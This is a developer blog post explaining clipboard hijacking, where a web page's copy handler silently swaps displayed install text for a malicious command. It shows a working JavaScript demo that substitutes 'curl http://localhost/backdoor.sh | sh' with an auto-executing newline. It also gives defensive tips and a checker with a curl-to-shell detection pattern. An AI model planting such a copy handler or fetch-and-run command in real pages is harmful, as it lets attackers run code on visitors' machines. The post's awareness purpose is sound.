The Dangers of Copy & Paste (Copas)
I'm sure fellow developers have at some point copied a command from a website. We assume that the text we're copying is legitimate. But is it? What if the text we copy is replaced with a command that can harm us or that contains malicious code?
All a hacker needs is a single command that can insert a backdoor or virus, allowing them to remotely control your device. This attack is simple yet effective. Here's a further explanation of how it works.
Watch the video: simulating the risk of copying and executing code directly in a terminal. For instance, when you are installing a package with npm and find the command on a web page, most of us simply copy and paste that text into the terminal without much thought. Codepen: Copy&Paste.
PROBLEM: Another issue here is that the hacker ends the harmful command with a newline character (\n), the equivalent of pressing Enter, so the copied command runs automatically as soon as it is pasted.
Example Script Used:
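```html
<p id="copy">npm install package</p>
<script>
  // Demo: the copy handler replaces what lands on the clipboard.
  document.getElementById('copy').addEventListener('copy', function (e) {
    e.clipboardData.setData('text/plain', 'curl http://localhost/backdoor.sh | sh\n');
    e.preventDefault(); // suppress the default copy of the visible text
  });
</script>
```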
How to Avoid It?
- Ensure that the websites you visit are trustworthy and secure. For instance, when looking for documentation or a package, go directly to the official site.
- As a precaution, don't paste copied text directly into the terminal. Try pasting it into a notepad or another text editor first.
- In essence, avoid pasting text directly into the terminal.
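
One way to automate the "paste into an editor first" check from the list above, as an added example that is not part of the original post. The function names `inspectPaste` and `showInvisible` and the finding labels are hypothetical; the sample strings are the visible text and clipboard text from the example script on this page.

```javascript
// Added example: checks clipboard text before it reaches a shell.
// inspectPaste and its finding names are hypothetical, not a library API.
function inspectPaste(visibleText, clipboardText) {
  const findings = [];
  // 1. A copy handler can substitute text: compare with what was on screen.
  if (clipboardText.trim() !== visibleText.trim()) {
    findings.push('differs-from-visible-text');
  }
  // 2. A trailing newline makes the shell run the line as soon as it is pasted.
  if (/[\r\n]$/.test(clipboardText)) {
    findings.push('trailing-newline');
  }
  // 3. Newlines inside the text mean more than one command.
  if (/[\r\n]/.test(clipboardText.replace(/[\r\n]+$/, ''))) {
    findings.push('multiple-lines');
  }
  // 4. Other control characters (escape sequences, backspace) can hide text.
  if (/[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/.test(clipboardText)) {
    findings.push('control-characters');
  }
  // 5. A download piped straight into an interpreter.
  if (/\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/.test(clipboardText)) {
    findings.push('download-piped-to-shell');
  }
  return findings;
}

// Render control characters visibly so the text can be reviewed before running.
function showInvisible(text) {
  return text.replace(/[\x00-\x1f\x7f]/g, (c) =>
    '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0'));
}

// Constructed sample: visible text and clipboard text from the script on this page.
const visible = 'npm install package';
const pasted = 'curl http://localhost/backdoor.sh | sh\n';
console.log(inspectPaste(visible, pasted));   // three findings
console.log(showInvisible(pasted));           // newline shown as \x0a
console.log(inspectPaste(visible, visible));  // no findings
```
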
# Author's Message
Always be cautious and vigilant, because we never know what kind of mischief we might face in the future.
That's all I have to offer. I hope it's helpful. Thank you! 😁